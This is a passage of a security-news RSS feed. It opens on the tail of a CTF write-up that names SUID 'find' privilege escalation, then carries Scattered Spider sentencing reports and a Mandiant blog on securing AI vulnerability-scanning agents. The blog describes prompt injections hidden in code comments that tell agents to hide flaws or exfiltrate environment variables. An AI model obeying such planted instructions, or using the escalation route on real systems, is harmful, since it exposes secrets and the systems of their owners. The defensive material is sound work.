-quit</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iCjLaASM-_9QRWRipFiEFA.png"></figure><p>whoami returned root. Flag 4 was in /root.</p><h3>Final Thoughts</h3><p>Two techniques in this CTF are worth remembering beyond the lab.</p><p>The hidden port 8888 on target1 is a reminder that netstat inside a session reveals far more than an external Nmap scan ever will — internal services are invisible from outside and often completely unprotected because of it. Always check what's listening locally once you have a foothold.</p><p>The SUID find escalation on target2 is a textbook GTFOBins vector. The lesson isn't just about find specifically — it's about building the habit of checking for SUID binaries early in post-exploitation. And GTFOBins is the resource to bookmark: if a binary is on that list and has SUID, you likely have a path to root.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9815c8abdfcb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine-9815c8abdfcb">Host &amp; Network Penetration Testing: Exploitation CTF 3 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 Staff]]></title>
<description><![CDATA[Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29…
Read more →
The post Two Hackers Jailed for Hacking 148...]]></description>
<link>https://tsecurity.de/de/3675131/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675131/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staff/</guid>
<pubDate>Fri, 17 Jul 2026 07:37:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staff/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staff/">Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 Staff</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 staffs]]></title>
<description><![CDATA[Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29…
Read more →
The post Two Hackers Jailed for Hacking 148...]]></description>
<link>https://tsecurity.de/de/3675030/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675030/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/</guid>
<pubDate>Fri, 17 Jul 2026 06:22:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/">Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 staffs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 staffs]]></title>
<description><![CDATA[Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29 million. On June 22, 2026, Thalha Jubair and Owen Flower...]]></description>
<link>https://tsecurity.de/de/3674989/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674989/it-security-nachrichten/two-hackers-jailed-for-hacking-148-tfl-systems-forcing-password-reset-for-27000-staffs/</guid>
<pubDate>Fri, 17 Jul 2026 05:37:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two young members of the Scattered Spider cybercrime group have been jailed for a 2024 attack that knocked out 148 Transport for London (TfL) systems, forced all 27,000 staff to reset passwords in person, and cost the organization about £29 million. On June 22, 2026, Thalha Jubair and Owen Flowers pleaded guilty to a cyberattack […]</p>
<p>The post <a href="https://cybersecuritynews.com/two-scattered-spider-hackers-jailed/">Two Hackers Jailed for Hacking 148 TfL Systems, Forcing Password Reset for 27,000 staffs</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scattered Spiders sentenced, OpenAI builds an AI that breaks AIs, and Iran leans on ChatGPT]]></title>
<description><![CDATA[Two leading Scattered Spider members, Thaila Jubar and Owen Flowers, were sentenced to five years and six months for the 2024 Transport for London hack that knocked 148 systems offline, forced 27,000 password resets, stole customer data, and cost TfL…
Read more →
The post Scattered Spiders senten...]]></description>
<link>https://tsecurity.de/de/3674887/it-security-nachrichten/scattered-spiders-sentenced-openai-builds-an-ai-that-breaks-ais-and-iran-leans-on-chatgpt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674887/it-security-nachrichten/scattered-spiders-sentenced-openai-builds-an-ai-that-breaks-ais-and-iran-leans-on-chatgpt/</guid>
<pubDate>Fri, 17 Jul 2026 03:36:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two leading Scattered Spider members, Thaila Jubar and Owen Flowers, were sentenced to five years and six months for the 2024 Transport for London hack that knocked 148 systems offline, forced 27,000 password resets, stole customer data, and cost TfL…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/scattered-spiders-sentenced-openai-builds-an-ai-that-breaks-ais-and-iran-leans-on-chatgpt/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/scattered-spiders-sentenced-openai-builds-an-ai-that-breaks-ais-and-iran-leans-on-chatgpt/">Scattered Spiders sentenced, OpenAI builds an AI that breaks AIs, and Iran leans on ChatGPT</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HP Fined $14 Million For 'Cartelization' of Ink Cartridges, Toner, PCs]]></title>
<description><![CDATA[India's Competition Commission has fined HP India and its partners about 1.4 billion rupees ($14.4 million), alleging the company colluded with resellers to rig government PC bids and fix prices for ink cartridges, toner, and other printing supplies. "It said that HP was aiming to outcompete othe...]]></description>
<link>https://tsecurity.de/de/3674810/it-security-nachrichten/hp-fined-14-million-for-cartelization-of-ink-cartridges-toner-pcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674810/it-security-nachrichten/hp-fined-14-million-for-cartelization-of-ink-cartridges-toner-pcs/</guid>
<pubDate>Fri, 17 Jul 2026 01:22:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[India's Competition Commission has fined HP India and its partners about 1.4 billion rupees ($14.4 million), alleging the company colluded with resellers to rig government PC bids and fix prices for ink cartridges, toner, and other printing supplies. "It said that HP was aiming to outcompete other OEMs and discourage resellers from selling 'counterfeit' ink and toner," adds Ars Technica. From the report: In an order, the CCI said that HP India worked with five resellers to coordinate their bid prices for government contracts to increase the chances of an HP partner winning the contracts. The company was fined 1.3 billion rupees (about $13.1 million). [...] HP was also fined 119.8 million rupees (about $1.2 million) for "indulging in cartelization in sale and supply of supplies products comprising of toner, cartridges, and other consumable used with print hardware products," CCI said in its announcement. The agency also fined 21 HP resellers 35.2 million rupees (about $365,335).
 
In a separate order, the CCI said that WhatsApp records showed that HP and 16 of its Tier-2 reseller partners operated "in a collusive arrangement" and that the messages show the companies engaging in "bid rigging, including cover bidding, price fixation, and customer allocation during 2017-2020." HP India played a central role, the regulator said.
 
Per the order, HP India said that high printing supply prices led some resellers to threaten to "shift to low-cost counterfeit products to compete on price." "HP India was commercially forced into a position where it had to support the collusive arrangement adopted by the Tier-2 resellers," the order reads. For its part, the order said that HP India "humbly objects to HP India's role being characterized as a 'kingpin' of the entire collusive arrangement." [...] The CCI also ordered HP India and its channel partners to "cease and desist from anti-competitive conduct" and to hold competition compliance training programs within 60 days.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=HP+Fined+%2414+Million+For+'Cartelization'+of+Ink+Cartridges%2C+Toner%2C+PCs%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F16%2F2210245%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F16%2F2210245%2Fhp-fined-14-million-for-cartelization-of-ink-cartridges-toner-pcs%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/07/16/2210245/hp-fined-14-million-for-cartelization-of-ink-cartridges-toner-pcs?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Scattered Spider Hackers Get 5.5 Years Each for £29 Million TfL Hack]]></title>
<description><![CDATA[Owen Flowers, 18, and Thalha Jubair, 20, were each sentenced to five and a half years at Woolwich Crown Court on Thursday, 16 July 2026, for the 2024 hack of Transport for London.

The attack left 148 TfL systems inoperable and forced all 27,000 of the transport authority's employees into an offi...]]></description>
<link>https://tsecurity.de/de/3674377/it-security-nachrichten/two-scattered-spider-hackers-get-55-years-each-for-29-million-tfl-hack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674377/it-security-nachrichten/two-scattered-spider-hackers-get-55-years-each-for-29-million-tfl-hack/</guid>
<pubDate>Thu, 16 Jul 2026 20:20:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Owen Flowers, 18, and Thalha Jubair, 20, were each sentenced to five and a half years at Woolwich Crown Court on Thursday, 16 July 2026, for the 2024 hack of Transport for London.

The attack left 148 TfL systems inoperable and forced all 27,000 of the transport authority's employees into an office to get their passwords reset in person. Both the NCA and the CPS put TfL's losses and recovery]]></content:encoded>
</item>
<item>
<title><![CDATA[Linus Torvalds Told Kernel Developers that Linux is Not Against AI projects]]></title>
<description><![CDATA[Linux creator Linus Torvalds has told kernel developers that the Linux project is not anti-AI, arguing that artificial intelligence and large language models should be judged on whether they provide practical technical value. He emphasized that developers will not be forced to use AI tools, but o...]]></description>
<link>https://tsecurity.de/de/3674136/it-security-nachrichten/linus-torvalds-told-kernel-developers-that-linux-is-not-against-ai-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674136/it-security-nachrichten/linus-torvalds-told-kernel-developers-that-linux-is-not-against-ai-projects/</guid>
<pubDate>Thu, 16 Jul 2026 18:41:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Linux creator Linus Torvalds has told kernel developers that the Linux project is not anti-AI, arguing that artificial intelligence and large language models should be judged on whether they provide practical technical value. He emphasized that developers will not be forced to use AI tools, but opposition should not prevent others from using them responsibly. […]</p>
<p>The post <a href="https://cybersecuritynews.com/linus-torvalds-linux-ai/">Linus Torvalds Told Kernel Developers that Linux is Not Against AI projects</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Demystifying AI Exploits: A Blueprint for AI-Assisted Vulnerability Management]]></title>
<description><![CDATA[Written by: Jules Czarniak

Introduction 
As highlighted in the Mandiant M-Trends 2026 report, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. 
To keep pace, many security teams are exploring how to integrate la...]]></description>
<link>https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</guid>
<pubDate>Thu, 16 Jul 2026 16:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jules Czarniak</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction </span></h3>
<p><span>As highlighted in the </span><a href="https://cloud.google.com/security/resources/m-trends"><span>Mandiant M-Trends 2026 report</span></a><span>, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. </span></p>
<p><span>To keep pace, many security teams are exploring how to integrate large language model (LLM) agents into their codebases, development environments and continuous integration and continuous delivery (CI/CD) pipelines for automated vulnerability discovery and remediation. However, deploying privileged artificial intelligence (AI) agents without mature integration processes introduces new architectural risks. </span></p>
<p><span>In response to customer inquiries about how to safely integrate AI capabilities into vulnerability management workflows, this blog provides actionable guidance from Mandiant Consulting about how to establish operational guardrails for AI assisted vulnerability management, including several detailed scenarios. What each of these examples show is that security teams can accelerate workflows with AI while also upholding the structural integrity of their environments. We suggest that combining AI capabilities with deterministic controls and human intelligence in strategic ways maximizes benefits and reduces risk. </span></p>
<h3><span>Establish Operational Guardrails to Safely Deploy AI Agents</span></h3>
<p><span>To safely adopt advanced AI capabilities without introducing unpredictable failures into deployment pipelines, organizations should ground their approach in established industry standards. While guidelines like the </span><a href="https://www.nist.gov/itl/ai-risk-management-framework" rel="noopener" target="_blank"><span>NIST AI Risk Management Framework (RMF)</span></a><span> and the </span><a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/" rel="noopener" target="_blank"><span>OWASP Top 10 for LLMs</span></a><span> provide comprehensive baselines for identifying risks, operationalizing these controls requires a structural blueprint.</span></p>
<p><span>Frameworks like </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>Google’s Secure AI Framework (SAIF)</span></a><span> </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>and</span></a><a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/1018686.pdf" rel="noopener" target="_blank"><span> </span><span>Google’s approach to secure AI Agents</span></a><span> provide a practical path forward, demanding that organizations extend existing deterministic controls directly into the AI execution environment. When deploying AI agents, security teams should navigate specific operational and structural risks:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Pre-agent data security and Defense-in-Depth:</strong><span> Agents should not be able to access personally identifiable information (PII), protected health information (PHI), or other sensitive data. Organizations should enforce data security before the prompt reaches the model. This includes strictly using non-production environments populated with synthetic data for testing. For production, security teams should deploy a hybrid defense-in-depth model. This includes Layer 1 deterministic policy engines acting as chokepoints, alongside Layer 2 reasoning-based defenses like specialized guard models (such as </span><a href="https://docs.cloud.google.com/model-armor/overview"><span>Model Armor</span></a><span> or similar provider-agnostic guardrails) to filter out sensitive data and block malicious prompt injections before they reach the agent layer. Crucially for vulnerability discovery, security teams should treat the codebase itself as an untrusted input. Threat actors can embed indirect prompt injections within source code comments or third-party dependencies (e.g., hidden instructions telling the agent to ignore vulnerabilities or exfiltrate environment variables), making input sanitation a requirement even for internal scanning.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cloud provider limitations and zero data retention (ZDR):</strong><span> Many cloud and LLM providers block or throttle automated offensive security probing by default to prevent abuse. Organizations should establish clear rules of engagement and authorized testing agreements to navigate acceptable use policies. Furthermore, organizations should enforce strict zero data retention (ZDR) agreements with their LLM providers to guarantee that proprietary code and discovered vulnerabilities are never used to train external models.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Workload isolation:</strong><span> Agent workloads should execute in strictly isolated, unprivileged containers with dynamically limited privileges. By relying on robust sandboxing to prevent privilege escalation, if an agent hallucinates a destructive command or is hijacked via prompt injection, the blast radius remains contained.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Red Teaming:</strong><span> Before deploying autonomous vulnerability scanners that can dynamically spin up sandboxes and execute code, organizations should subject the AI agents themselves to human-led red teaming as part of comprehensive assurance efforts. This validates the agent's resilience against jailbreaks, recursive logic loops, and complex prompt injections, ensuring the security tooling does not become the attack vector.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Least-Privileged Machine Identities and Human Controllers:</strong><span> While workloads should be isolated, agents inherently require privileges to generate pull requests and commit code. Security teams should ensure these agents operate under distinct, strictly scoped machine identities that tie back to human controllers to ensure accountability and user consent. Organizations should use short-lived, just-in-time (JIT) tokens bound exclusively to the specific repository and branch under review. T</span><span>his enforces the principle of limited agent powers and ensures that even if an agent’s container is compromised via prompt injection, the threat actor cannot pivot to modify adjacent enterprise codebases.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Supply chain resilience for skills:</strong><span> As developers augment AI with third-party skills and model context protocol (MCP) servers, security teams should treat these integrations as untrusted supply chain components. MCP plugins introduce the risk of supply chain poisoning, where a previously benign integration is silently updated with malicious dependencies. Additionally, security teams should evaluate the underlying agent orchestration frameworks themselves (e.g., LangChain, AutoGen) for inherent vulnerabilities, such as session memory poisoning or recursive loop hijacking.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Toxic flow analysis (TFA) and Observable Actions:</strong><span> The objective of TFA is to monitor data paths at runtime, ensuring agents do not exfiltrate sensitive internal context to unvetted external endpoints. Agent actions, inputs, reasoning, and outputs must be fully observable and transparently logged. While implementing dynamic taint tracking for LLMs remains a complex architectural challenge, organizations should clearly separate this runtime observability from static supply chain controls. Integrating threat intelligence to hash and vet incoming agent tools provides a necessary baseline for verifying integrity </span><span>before</span><span> deployment. However, because static controls cannot address behavior post-deployment, mitigating data exfiltration ultimately requires active runtime monitoring and secure, centralized logging to trace and restrict the actual flow of data.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image1.max-1000x1000.png" alt="Demystifying AI image1">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="u6hlz">Figure 1: Visual representation of an isolated AI agent environment using SAIF mechanisms</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>By operationalizing these tools within frameworks that demand verifiable integrity and structural resilience, organizations can safely bridge the gap between AI velocity and enterprise defense.</span></p>
<h3><span>The need for human-led threat modeling</span></h3>
<p><span>While LLMs excel at identifying syntax patterns, source code itself rarely contains the full picture of unwritten business intent. Some organizations attempt to solve this by connecting LLM agents to internal wikis, design documents, and issue trackers using retrieval-augmented generation (RAG).</span></p>
<p><span>While RAG gives the model access to external business context, it is not a perfect fix. Corporate documentation is frequently stale, contradictory, or incomplete. An AI agent might retrieve an outdated architecture diagram and confidently hallucinate a secure path that no longer exists in production. Because LLM agents struggle to resolve conflicting, undocumented human assumptions, human-led threat modeling remains a critical security control across both legacy applications and modern agent workflows.</span></p>
<p><span>Security teams should apply threat modeling during both the pre-build system design phase to establish a secure foundation, and during post-build architecture reviews. While an AI agent might successfully identify a poorly configured internal endpoint locally, a human threat modeler asks the structural question: </span><span>why does that microservice possess broad database read permissions in the first place?</span><span> </span></p>
<p><span>Identifying architectural vulnerabilities requires reasoning about business risk, data sensitivity, and operational constraints. To structure this process, organizations can use industry frameworks like PASTA (Process for Attack Simulation and Threat Analysis) or service offerings like the </span><a href="https://services.google.com/fh/files/misc/ds-threat-modeling-security-service-en.pdf" rel="noopener" target="_blank"><span>Mandiant Threat Modeling Security Service</span></a><span> to map trust boundaries, uncover structural design flaws, and prioritize compensating controls. Securing fundamental architecture through human oversight is a necessary component when relying on automated agents to find bugs in a poorly designed system.</span></p>
<p><span>Once these AI agents are safely sandboxed, as guided by SAIF, and the architecture is verified through threat modeling, organizations can typically apply them to two different problem spaces: Enterprise Vulnerability Management (to assist in managing the volume of known CVEs in commercial off-the-shelf (COTS) software and infrastructure) and Product Security (to identify vulnerabilities in 1st-party (1P) code).</span></p>
<h3><span>Track 1: Enterprise Vulnerability Management</span></h3>
<h4><span>Foundational security and discovery </span></h4>
<p><span>While the second track of this post explores how AI agents can uncover complex zero-days in custom code, organizations should manage the scale of enterprise infrastructure in tandem with these AI deployments. Even as new AI capabilities dominate headlines, organizations should still address foundational security challenges, such as secrets sprawl, unmanaged service accounts, missing FIDO2 MFA, and legacy VPN concentrators. Although vulnerability exploitation was the primary initial infection vector in intrusions Mandiant investigated last year, threat actors consistently rely on missing foundational controls and unpatched edge devices to secure and escalate their foothold after exploiting a vulnerability.</span></p>
<p><span>Furthermore, AI cannot replace foundational visibility. As security teams deploy AI agents, they should simultaneously close these tactical entry points by maximizing dynamic discovery capabilities like External Attack Surface Management (EASM), Cloud Security Posture Management (CSPM), and Continuous Threat Exposure Management (CTEM). In hybrid and cloud environments, tools like </span><a href="https://cloud.google.com/wiz?e=48754805"><span>Wiz</span></a><span> can be used to map this initial footprint.</span></p>
<h3><span>Risk-based vulnerability management </span></h3>
<p><span>Vulnerability management teams are already overwhelmed by the current volume of findings generated by traditional scanners. As organizations scale dynamic discovery tools, such as EASM, CSPM and CTEM, alongside automated AI agents, this influx of findings will compound the problem. To manage this influx, telemetry from these diverse discovery methods must first be normalized and deduplicated. This normalized data serves two purposes: it feeds directly into the risk engine, and it acts as a live overlay to correct stale records in the configuration management database (CMDB). By evaluating the deduplicated vulnerabilities alongside this newly updated asset context and frontline threat intelligence, the RBVM engine calculates a custom risk score that allows security teams to dynamically prioritize remediation.</span></p>
<p><span>A mature RBVM methodology calculates a customized risk score on a 0 to 100 scale using a weighted average. A sample formula for calculating this risk-based score is:</span></p>
<p><span>Final Score = (W_1 * S_vuln) + (W_2 * S_asset) + (W_3 * S_threat)</span></p>
<p><span>The variables and weights (W) are customized to the organization's risk appetite (for example, 0.20 for vulnerability, 0.40 for asset, and 0.40 for threat, summing to 1.0), while the underlying variables (S) are scored on a 0 to 100 scale and defined as follows:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Vulnerability severity (S_vuln): </strong><span>The inherent technical severity of the flaw. This is calculated by taking the CVSS Base Score (which natively accounts for confidentiality, integrity, and availability impact) and multiplying it by 10.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Asset context (S_asset): </strong><span>A combined metric of exposure and data sensitivity. Scores range from 100 for internet-facing assets holding customer data, down to 25 for internal-only assets with no sensitive data. To translate this impact into monetary terms for non-technical stakeholders, organizations can incorporate Factor Analysis of Information Risk (FAIR) principles into this metric. However, this approach requires highly accurate, continuously updated financial data that many enterprises struggle to maintain at scale.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Threat context (S_threat): </strong><span>The real-world urgency of the vulnerability. Scores range from 100 if actively exploited by threat actors relevant to the organization's profile, 75 if a proof-of-concept exists or if it is a vulnerability class easily exploited by autonomous AI agents, down to 25 if the exploit is theoretical and highly complex. Organizations should also map the Exploit Prediction Scoring System (EPSS) probability percentage directly into this variable. This allows the threat score to automatically scale up or down as real-world exploitation telemetry shifts, aligning static vulnerability data with active threat intelligence.</span></p>
</li>
</ul>
<p><span>An asset's customized risk score should directly influence internal remediation service-level agreements (SLAs), unless external compliance-driven mandates, such as CISA Binding Operational Directives (BODs), or relevant equivalents, override internal prioritization. A risk-driven and threat-intelligence-driven vulnerability prioritization methodology will help organizations focus resources on managing and mitigating the most critical security vulnerabilities first. This is an area where LLMs can support the vulnerability management process, particularly by helping teams synthesize unstructured threat intelligence to surface relevant risk contexts more efficiently. Enforcing strict SLOs for patching, while requiring formal risk acceptance documentation for any patching exceptions, will help reduce the number of vulnerabilities available to threat actors and increase the visibility of outstanding risks across the organization. Furthermore, organizations should integrate RBVM data directly into their security orchestration, automation, and response (SOAR) platforms for automated alert enrichment.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image5.max-1000x1000.png" alt="Demystifying AI image5">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ce5s1">Figure 2: Integration points of a risk-based vulnerability management (RBVM) program.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Containment and Observability</span></h3>
<p><span>Modern architecture blueprints must prioritize attack surface reduction under the assumption that vulnerabilities will inevitably be exploited. Moving away from traditional perimeter defenses, organizations should align with zero trust principles, ensuring that security boundaries are established around every asset, workload, and identity.</span></p>
<p><span>A component of this alignment is the implementation of strong authentication principles. Organizations should eliminate implicit trust by enforcing continuous, context-aware authentication and authorization. Utilizing Zero Trust Network Access (ZTNA) solutions, such as Identity-Aware Proxies (IAP), shields critical management interfaces (e.g., SSH, RDP) and internal systems from direct internet exposure, granting access only to verified identities and compliant devices.</span></p>
<p><span>For public-facing applications and APIs, attack surface reduction involves deploying Layer 7 inspection at the load balancer or API gateway level. This hardening layer enforces strict schema validation, intercepting and neutralizing malformed inbound traffic and potential exploits before they can interact with internal application logic.</span></p>
<p><span>Securing the software supply chain is equally vital in modern blueprints, and organizations should align with frameworks like </span><a href="https://slsa.dev/spec/v0.1/levels" rel="noopener" target="_blank"><span>Supply-chain Levels for Software Artifacts (SLSA)</span></a><span> across both dependency and build tracks. Security policies should mandate that third-party dependencies are routed through a centralized artifact repository equipped with automated curation services, such as </span><a href="https://cloud.google.com/security/products/assured-open-source-software"><span>Google Assured Open Source Software (OSS)</span></a><span> or an equivalent solution, preventing untrusted code from entering the development lifecycle. Furthermore, maturing toward advanced SLSA build levels (e.g., SLSA level 3) through the implementation of isolation, ephemerality and reproducibility requirements via  ephemeral compute infrastructure for CI/CD runners reduces the likelihood of attacker persistence by ensuring environments are short-lived and automatically cycled.</span></p>
<p><span>To complement these pre-build controls, runtime observability should be established across all production workloads. This requires monitoring both infrastructure-level behavior and the specific runtime libraries actively executing in production, which surfaces true exploitable risk far beyond a static Software Bill of Materials. In tandem with monitoring workloads, organizations should secure how they authenticate by implementing workload identity federation. By removing static credentials and instead using short-lived tokens backed by strong cryptographic identity verification, organizations can reduce the risk of credential theft and unauthorized lateral movement.</span></p>
<p><span>Within the internal environment, microsegmentation should be enforced to break down flat networks into granular security zones. Routing application traffic through a Secure Access Service Edge (SASE) architecture integrates network routing directly with robust identity controls, rendering internal services completely invisible to unauthenticated users and containing threats to their initial point of entry.</span></p>
<p><span>Finally, automated containment and incident response within a zero trust framework must rely on deterministic, auditable tooling. Endpoint detection and response (EDR) platforms and SOAR playbooks should handle high-fidelity containment tasks through hardcoded execution logic. While AI tools accelerate triage and policy recommendation, actual execution capabilities must remain restricted to well-defined, pre-tested workflows to maintain total architectural predictability.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image8.max-1000x1000.png" alt="Demystifying AI image8">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 3: Structural containment and observability architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Track 2: Product Security &amp; Development (1P Code)</span></h3>
<h4><span>Deterministic and probabilistic tooling</span></h4>
<p><span>Integrating LLM agents into vulnerability management and security workflows requires recognizing the differences between deterministic and probabilistic tooling. Traditional SAST and DAST tools utilize fixed methodologies to evaluate vulnerabilities through structural code parsing or definitive runtime observations. LLMs, however, evaluate source code by processing tokens simultaneously to calculate statistical and semantic relationships, rather than tracing deterministic execution tracks.</span></p>
